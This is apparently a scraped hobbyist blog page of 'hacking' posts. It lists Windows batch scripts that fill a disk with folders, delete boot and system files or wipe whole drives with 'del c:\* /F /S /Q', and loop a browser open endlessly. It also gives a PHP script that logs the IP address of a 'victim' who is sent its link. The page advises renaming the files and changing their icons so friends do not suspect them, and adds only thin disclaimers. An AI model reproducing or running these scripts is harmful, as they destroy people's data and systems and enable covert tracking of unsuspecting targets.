Welcome Computer Youth

To our Website...

Join Hands

To Learn...

We are A TEAM

Together Everyone Achieve More...

CYP

Provide You...

Connect with us

Subscribe on your Mobile and Connect with us on skype...

Thanks to Visit our Website

All Computer Youth are welcome to this program...

Showing posts with label hacking shits. Show all posts
Showing posts with label hacking shits. Show all posts

Remote Desktop for Windows 7

Hey Computer Youth.... We hope you will like it.
This is for Windows 7 only

 

 
 
 
  
 





 
 

Regards:
CYP



Remote Desktop for X.P

Hey Computer Youth.... We hope you will like it.
This is for X.P Windows only

  

 

 
 
 
 

Regards:
CYP








s

Notepad Most Dangerous Viruses

 Dangerous Viruses



Be Aware of Virus & Learn How they works

NOTE: Try at your own risk
CYP IS NOT RESPONSIBLE FOR ANY LOSS CAUSED…
 We have listed down  5 dangerous Viruses

1. How to create more than 3,000 folders under a minute:
1) Open your notepad and type
the following code.
@echo off
:top
md %random%

goto top

2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.

====================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
====================================================================

2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
 
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
DONT RUN THE BATCH FILE ,YOU
WONT RECOVER BACK AFTER YOU
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

====================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
====================================================================
3. How to Delete all your system:
files with a small command!
Copy the following code into your
notepad and save it as a .bat
file.
del *.*

All your files in your hard disk will
vanish in less than 5mins.
====================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
====================================================================

4. RAM crashing trick:

Those bloggers who wants more views of there blog.. try it... 
Note: It will continuously will open the separate of page of given link.
open notepad and type

:A
start http://computeryouthprogram.com/
goto A

save with .bat extension.
Infinitely loops your browser to
open up http://computeryouthprogram.com/
====================================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
====================================================================

5. Crash a Computer System With:

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.

YOU ARE WARAN THIS LINK WILL CRASH
YOUR BROWSER OR WORSE, YOUR
COMPUTER !!!!

Note: CYP purpose is not to teach you how to hack ...
Thanks





How to get IP address of someone ?

How to get IP address of someone ?
grab IP address…………

In this tutorial you’ll learn how to get IP address of some person using PHP script.


This method can be used to grab someone IP address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Do ?

1. Copy the below codes into Notepad and save it as Grab.php (.php is must)


<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);imagefill($img_number,0,0,$bac­kcolor);
$number0 = ” This is Your IP/Proxy”;
$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]”;
$number2 = ” Host/Proxy: $hostname”;
$number4 = ” _________________________________”;Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);header(“Content-type: image/png”);
imagepng($img_number);
$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);
$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;
fwrite($file, $file2);
fclose($file);
 ?>



2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his IP will be saved in your free web hosting site.
6. Enjoy you are Done !!

Subscribe CYP

To get status on your mobile....!
Type F (space) ComputerYouthPk & send it to 40404